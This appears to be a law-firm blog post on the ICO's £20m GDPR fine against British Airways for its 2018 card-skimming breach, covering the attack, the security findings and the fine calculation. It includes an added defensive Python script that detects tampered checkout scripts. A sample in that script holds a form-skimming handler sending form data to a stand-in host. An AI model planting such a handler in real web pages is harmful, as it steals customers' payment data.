In a long-awaited final decision, the UK Information Commissioner’s Office (the “ICO”) has issued a fine of £20m to British Airways (“BA”) following a data breach that took place in 2018.  Although by some way the largest fine ever issued by the ICO, this represents a significant reduction from the £183.39m fine initially proposed by the ICO in July 2019, as we reported here.

The ICO’s penalty notice (the “Decision”) gives a useful insight into how the regulator will assess whether there has been a breach of the requirement to implement appropriate security measures and into the calculation of the appropriate fine, although the policy for calculating the fine is subject to an ongoing review. The description of the interactions between BA and the ICO will be of interest to those dealing with the regulator, and the fact BA has not admitted liability is a nod to the ongoing litigation.

Data Breach

The Decision, which runs to some 114 pages, states that the attack is believed to have resulted in potential access to the personal data of over 429,000 BA customers and staff. This included names, addresses, payment card numbers and CVV numbers of approximately 244,000 BA customers.

The Decision sets out the alleged facts of the breach, many of them previously unknown. In summary, the Decision reports that:

  • between 22 June and 5 September 2018, a malicious actor (the “Attacker”) gained access to an internal BA application through the use of compromised credentials for a Citrix remote access gateway (“CAG”);
  • the compromised credentials belonged to a user within a third-party supplier to BA, who accessed BA’s network remotely;
  • after gaining access to the wider network, the Attacker traversed the network and ultimately managed to edit a JavaScript file on BA’s website. The edits made by the Attacker enabled the exfiltration of cardholder data from “www.britishairways.com” to an external domain (www.BAways.com) controlled by the Attacker;
  • between 21 August and 5 September 2018, when customers entered payment card information into BA’s website, a copy was sent to the Attacker, without interrupting the normal BA booking and payment procedure; and
  • the issue came to the attention of BA only when it was alerted by a third party.
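The final two bullets describe a modified script on the public website that quietly copied payment form data to a second host, which went unnoticed until a third party raised it. A practitioner reading the Decision will want to know how such a change can be caught from the defending side. The following is an added example (not code from the Decision, from BA or from the ICO) of two simple controls a site owner can run against the scripts it actually serves: comparing each served script to the hash of the version in source control, and flagging any absolute URL whose host is outside an allowlist. The sample scripts, the hostnames (all under `.invalid`) and the allowlist are constructed for illustration and are not the real files or domains involved in the incident.

```python
from __future__ import annotations

import hashlib
import re

# Constructed sample: the checkout script as committed to source control (the baseline).
BASELINE_JS = """\
function submitPayment(form) {
  return fetch("https://www.example-airline.invalid/api/pay", {
    method: "POST",
    body: new FormData(form),
  });
}
"""

# Constructed sample: the same script with an appended handler that sends a second
# copy of the form to another host. Stand-in content to exercise the checks only.
TAMPERED_JS = BASELINE_JS + """\
document.addEventListener("submit", function (e) {
  fetch("https://static-cdn.lookalike.invalid/collect", {
    method: "POST",
    body: new FormData(e.target),
  });
});
"""

# Assumed allowlist: the only hosts the checkout page is expected to contact.
ALLOWED_HOSTS = {"www.example-airline.invalid"}


def sha256_hex(text: str) -> str:
    """SHA-256 of the script body, used as the integrity baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def referenced_hosts(js: str) -> set[str]:
    """Hostnames appearing in absolute http(s) URLs inside the script."""
    return set(re.findall(r"https?://([A-Za-z0-9.-]+)", js))


def check_script(name: str, served_js: str, baseline_hash: str) -> list[str]:
    """Return a list of findings for one served script; an empty list means clean.

    Two independent checks: (1) the served bytes must hash to the baseline taken
    from source control, so any edit on the web server is flagged even if it looks
    harmless; (2) every host the script references must be on the allowlist, which
    also catches a script whose baseline was never recorded.
    """
    findings: list[str] = []
    if sha256_hex(served_js) != baseline_hash:
        findings.append(f"{name}: served content does not match baseline hash")
    for host in sorted(referenced_hosts(served_js) - ALLOWED_HOSTS):
        findings.append(f"{name}: references host outside allowlist: {host}")
    return findings


if __name__ == "__main__":
    baseline_hash = sha256_hex(BASELINE_JS)
    for label, body in (("baseline", BASELINE_JS), ("tampered", TAMPERED_JS)):
        print(label, check_script("checkout.js", body, baseline_hash) or "OK")
```

In practice the served body would be fetched from the live site on a schedule and the baseline hashes would come from the build pipeline; the host allowlist is the same set of origins one would place in a Content Security Policy `connect-src` directive, so the two controls reinforce each other.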

The ICO found that BA failed to process personal data in a manner that ensured appropriate security of the personal data, including protection against unauthorised or unlawful processing and against accidental loss, destruction or damage, using appropriate technical and organisational measures as required by the GDPR.

In the ICO’s view, how did BA fall short of its GDPR security obligations?

Not every instance of unauthorised processing or breach of security will amount to a breach of the GDPR. The obligation under the GDPR is to implement appropriate technical and organisational measures to ensure an appropriate level of security, taking into account factors such as the cost of implementation, the nature, scope, context and purposes of processing, and risk to the affected individuals.  The Decision noted that, when considering whether there has been a breach of the GDPR and whether to impose a penalty, the ICO must avoid reasoning purely with the benefit of hindsight. The focus should be on the adequacy and appropriateness at the time the measures were implemented, risks that were known or could have been reasonably identified or foreseen, and appropriate measures that could and should have been, but were not, in place.

The Decision identifies measures available to BA that were not taken, in respect of each of the eight steps of the attack identified in the ICO’s decision. These measures include: (i) limiting access to applications, data and tools to the degree required to fulfil a user’s role; (ii) undertaking rigorous testing, in the form of simulating a cyberattack, on the company’s systems; and (iii) protecting employee and third-party accounts with multi-factor authentication.

How was the fine calculated?

According to the Decision, the ICO’s process for calculating the fine consists of five steps:

  1. The ICO started with an amount reflecting any financial gain from the breach, which in BA’s case was £0.
  2. It added a penalty based on the scale and severity of the incident, which the ICO assessed at £30m.
  3. The ICO considered a further penalty to reflect any aggravating factors, but none were identified.
  4. The ICO considered whether an additional penalty was necessary for the fine to have a deterrent effect, and decided that none was necessary.
  5. The ICO then considered a reduction in the fine to reflect any mitigating factors, including ability to pay. It reduced the fine by 20%, to £24m, in recognition of the fact that: (i) BA took immediate steps to mitigate any damage suffered by the affected individuals; (ii) BA promptly informed the affected individuals, law enforcement and regulatory agencies, and the ICO, and fully cooperated with the ICO’s enquiries; (iii) widespread reporting on the breach is likely to have increased the awareness of other data controllers of the risks posed by cyberattacks and the need to take all appropriate measures to secure personal data; and (iv) the attack and subsequent regulatory action adversely affected BA’s brand and reputation. The ICO specifically mentioned the speed of BA’s individual notifications – within two days of discovering the breach – illustrating the benefits of a swift notification process.

Finally, having regard to the impact of the COVID-19 pandemic on BA’s business and consistent with its published guidance, the ICO decided that a further reduction of £4m was appropriate and proportionate, bringing the fine to £20m.

What happened to the proposed fine of £183.39m?

Following the publication of the ICO’s notice of intention to fine BA in July 2019, several extensions to the six-month period for issuing the fine were agreed.  The originally proposed fine was calculated using the ICO’s “Draft Internal Procedure” for calculating proposed penalties.  It is clear from the Decision that BA strongly contested the validity of using this Procedure.  It appears that the primary objection was the use of turnover ranges as a basis for determining the fine.

Ultimately, it appears that the ICO agreed not to apply the Draft Internal Procedure, and the final fine amount was determined without reference to the amount initially proposed. Instead, the ICO applied the framework set out in the GDPR and the UK Data Protection Act 2018 in conjunction with the ICO’s Regulatory Action Policy (“RAP”), which states that, before issuing fines, the ICO must take into account the economic impact and affordability of the fine for the company. The RAP is currently under review as part of an ongoing consultation. Under the proposals being consulted on, the ICO plans to reduce penalties by 20% when companies pay within 28 days and do not appeal.

Takeaways

The reduction in the fine amount will be seen by many as a victory for BA. It fought hard throughout the process, disputing both that there was a breach of the GDPR and that a penalty should be imposed.

Nonetheless, the fine still serves as a reminder that security of personal data is one of the most important principles of the European data protection regime. The final fine is dramatically higher than any previously issued by the ICO.

The ICO brought the enforcement action as the lead supervisory authority under the GDPR. The penalty and action were approved by the other EU DPAs through the GDPR’s cooperation process. Given Brexit, this fine may prove to be one of a very small number of actions taken through this process that would involve the ICO.

The specific security measures that the ICO believed should have been in place – role-based access control measures, tabletop exercises, and multi-factor authentication – are widely accepted in the security community as basic elements of a robust data security program. The Decision confirms that, as of 2018 at least, failure to implement such elements may be regarded as a violation of the GDPR.

The significant fine reduction as a result of mitigating factors encourages an open and cooperative approach with the ICO and proactive management of the risks to individuals resulting from data breaches.  At the same time, the Decision quotes heavily from BA’s written representations to the ICO, highlighting the need to carefully consider what companies communicate, and how.  As post-breach litigation risk increases, companies will need to be more careful than ever in this respect.

Author

Jeremy Feigelson is a Debevoise litigation partner, Co-Chair of the firm’s Data Strategy & Security practice, and a member of the firm’s Intellectual Property and Media Group. He frequently represents clients in litigations and government investigations that involve the Internet and new technologies. His practice includes litigation and counseling on cybersecurity, data privacy, trademark, right of publicity, false advertising, copyright, and defamation matters. He can be reached at jfeigelson@debevoise.com.

Author

Luke Dembosky is a Debevoise litigation partner based in the firm’s Washington, D.C. office. He is Co-Chair of the firm’s Data Strategy & Security practice and a member of the White Collar & Regulatory Defense Group. His practice focuses on cybersecurity incident preparation and response, internal investigations, civil litigation and regulatory defense, as well as national security issues. He can be reached at ldembosky@debevoise.com.

Author

Jane Shvets is a Debevoise partner in the firm’s White Collar & Regulatory Defense Group, focusing on white collar defense and internal investigations, in particular regarding compliance with corrupt practices legislation, as well as compliance assessments. Ms. Shvets also advises multinational clients on data protection and cybersecurity matters as well as a wide range of sanctions issues. She can be reached at jshvets@debevoise.com.

Author

Christopher Garrett is an English-qualified associate who is a member of the Debevoise Data Strategy & Security practice and part of the Corporate Department, also specialising in employment law. He can be reached at cgarrett@debevoise.com.

Author

Robert Maddox is an associate based in the London office and a member of Debevoise's White Collar & Regulatory Defense and International Dispute Resolution Groups, as well as the firm’s Data Strategy & Security practice. His practice focuses on complex multi-jurisdictional investigations, disputes and cybersecurity matters. He can be reached at rmaddox@debevoise.com.

Author

Martha Hirst is an associate in Debevoise's Litigation Department based in the London office. She is a member of the firm’s White Collar & Regulatory Defense Group, and the Data Strategy & Security practice. She can be reached at mhirst@debevoise.com.

Author

Dr. Friedrich Popp is a senior associate in Debevoise's Frankfurt office and a member of the firm’s Litigation Department. His practice focuses on arbitration, litigation, internal investigations, corporate law, data protection and anti-money laundering. In addition, he is experienced in Mergers & Acquisitions, private equity, banking and capital markets and has published various articles on banking law. He can be reached at fpopp@debevoise.com.